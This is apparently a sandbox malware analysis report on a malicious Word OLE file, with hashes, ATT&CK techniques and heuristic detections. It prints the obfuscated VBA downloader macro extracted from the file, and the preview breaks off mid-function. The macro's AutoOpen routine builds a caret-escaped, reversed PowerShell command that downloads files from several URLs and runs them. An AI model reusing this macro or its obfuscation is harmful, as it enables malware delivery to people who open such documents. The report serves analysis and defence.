Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92a725692661c208…

MALICIOUS

Office (OLE)

72.6 KB Created: 2018-09-12 16:55:00 Authoring application: Microsoft Office Word First seen: 2019-02-10
MD5: f60ec66986d82287e4bcc62a36d9461d SHA-1: 090518247e520cc35e7bfe5e173ac678d2321b88 SHA-256: 92a725692661c20840f83f3a200d0ffb4707bb3ad9a41c83ef2e8fd912b163ae
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This function is used to execute a command-line utility, likely for downloading and executing a second-stage payload. The ClamAV heuristic also flags it as a downloader.

Heuristics 6

  • ClamAV: Doc.Downloader.Nastjencro-6682581-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Nastjencro-6682581-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5008 bytes
SHA-256: d8f556930e6c793036d26fb49c90f3387fff19b3b3c3042e8014e2d3f6d7ebab
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FqbciqGtwBwuc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Set utbfpj = djuwo
   Set nWNOpc = wczszW
   Set iMqKWn = JBXdd
   Set OiELWi = Oowmv
   Set msNHrL = MHWzM
   Set tkhNw = zXjnTE
Shell VzqHBzaQj + vXzqHfWOzF + BJuTjjKtKmH + vjaBJVlraMN, Format(0)
   Set cwCUjB = RXvwD
   Set BbhNJI = jnorb
End Sub



Attribute VB_Name = "nbwhzlh"
Function VzqHBzaQj()

On _
Error _
Resume _
Next
Set csHou = wtOsjC
   Set bnObDw = owpWF
   Set OnWZVr = jUXtD
   Set HZBYT = oAsczk
jwJqCmH = Format(Chr(12 + 7 + 7 + 18 + 55)) + "md " + "/V:/" + Format(Chr(8 + 4 + 4 + 12 + 39)) + Format(Chr(3 + 2 + 2 + 5 + 22)) + "s^e^" + "t " + "w^uj^2=" + " ^ " + " ^ ^ "
Set RSoJOf = VHjCIr
   Set hzKzjX = wmhvNu
   Set lLinDF = uXtjD
   Set QjwjBu = ZjIZcT
qKmrSiwEG = "^" + "  ^ " + "^ " + "   ^  ^" + "  ^ }^" + "}" + "{h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^t^"
Set Rjbfv = ZEQlcF
   Set zTuHV = wjtzd
ijpsLadNiz = "a" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^}^" + ";" + "^ka^er^" + "b;" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn^$" + " m^e^" + "tI-" + "^e^k^" + "ovn^I" + ";)" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "Qn$ " + ",^j^Sa" + "$(^el" + "^i^"
Set OalDS = bAcOw
   Set sQPRs = aIFiMf
   Set lmbCi = zqqAZ
   Set iwrfKv = GQihlZ
okwNakOZ = "Fd^a^" + "oln^" + "w" + "o^D." + "r" + "^" + "ij${" + "yrt{"
Set rZXrj = NAMNPG
PGHmkbHEXpN = ")wN^s" + "$ ni jS" + "^" + "a^$(h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "a" + "^er" + "of;" + "'e^x^"
Set sFCvJ = CBkjO
   Set tRJFi = waBvAo
   Set TwfoEq = pfWJH
   Set XnKUVF = uEKXU
bjqivt = "e" + ".'^+^w^" + "w^" + "H$+^'\" + "^'+" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "i^l" + "^b" + "u" + "p^:vn^" + "e^$^="
Set JCHYWj = FrJdt
itzqfNc = Format(Chr(12 + 7 + 7 + 18 + 55)) + "^Q" + "n$^;^'9" + "^81^' ^" + "= w^w^H" + "^$^;" + ")'@^'" + "(t" + "il^p^" + "S^" + ".^'" + "^" + "8"
Set wamKDN = fSfjYs
   Set kPazV = BjYFS
   Set KrLDI = NzhQl
   Set WotnK = kaZNS
sdFSrdHqO = "X^D^" + "JJ^E^" + "U" + "^Y^x/^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^.^" + "h" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "et^-s" + "ni" + "^m//^:p"
Set urNEk = SUaTjP
   Set UCzpT = wNqlvG
   Set ldswsA = FUMAw
KvEzDXrW = "t^t^h@O" + "^EMu^" + "e" + "7^p" + "^" + "Tr" + "/^kd^"
Set ZGulc = XOdnS
   Set BcJiha = zakXap
pdskkb = ".^8^" + "1^0^2g" + "^o^f" + "n//^" + ":ptt" + "^h@"
VzqHBzaQj = jwJqCmH + qKmrSiwEG + ijpsLadNiz + okwNakOZ + PGHmkbHEXpN + bjqivt + itzqfNc + sdFSrdHqO + KvEzDXrW + pdskkb
   Set TFMiiR = dJitZ
   Set pVrwzQ = AUVlOP
   Set ZjlEr = VQfSQ
   Set XLnso = oRbXik
   Set KLpVi = bztEJ
End Function
Function vXzqHfWOzF()

On _
Error _
Resume _
Next
Set wJCUuu = Eqwin
   Set RjiwrU = OtzSo
   Set cwwuk = wkBpwp
iDjDmfJFat = "n^y5Rz" + "^d^w/" + "^" + "m^o" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + ".d^er"
Set hziND = zKbvGf
   Set DBFPK = tAnDLb
   Set tBCMMs = zobbJ
   Set VzdEOU = orawYc
PpwsXOW = "a^" + "uqs" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "n//:p^" + "tth" + "@^INv^" + "9" + "nb" + "ggZ^H" + "/^m^" + "o" + Format(Chr(12 + 7 + 7 + 18 + 55))
Set CbKRRZ = tTrEDN
   Set AwIfoZ = MMkEJ
   Set nQinN = zzLUv
TnYcpYli = "." + Format(Chr(12 + 7 + 7 + 18 + 55)) + "^" + "u^hphna" + "^h" + "rm//^:" + "^p^tth^" + "@^l^Wa" + "3" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "RJK/"
Set bIwzmj = pMZZB
   Set XQtbNm = ZUCXBv
   Set hMPRff = aQzEnA
   Set TcORfz = naCwJ
   Set khpVpw = dwpQNv
   Set MikCd = fpFFw
KaIjzvip = "^t^en.n" + "e^wi^" + "l^yrra" + "h//" + "^"
Set jPtGMC = qTaPKZ
UQGYAM = ":^p^t" + "t^h'=wN" + "^s^$;t" + "nei^l" + Format(Chr(8 + 4 + 4 + 12 + 39)) + "^" + "b^e^" + "W^.te" + "N^ t" + Format(Chr(12 + 7 + 7 + 18 + 55)) + "e" + "j^b^o-^" + "w^en=r^" + "ij" + "^$" + " l^leh" + "sr^ew^o"
Set AmZLM = oQrcoh
   Set dAMzcJ = uijilu
   Set nbnWr = XG
... (truncated)